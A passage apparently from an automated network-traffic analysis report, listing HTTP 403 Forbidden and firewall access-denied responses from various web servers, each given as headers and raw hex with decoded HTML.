22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:02 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:02 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:02 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:02 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:02 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s9UvX6BdgvnIrTjDjEfoXQd%2BN95ymB1rmfvjCEvmbZ3EJMoidlsOhbBHJIav8swaGiFXld2AUWMfijw9cY8bXNSCfm%2BjtrK57QLlsoFvpt2XtI4somj%2FL265Hlg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6e611c309036-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:02 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:05 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:08:05 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: eFdSkuVD/yb9hVH55Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:08:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 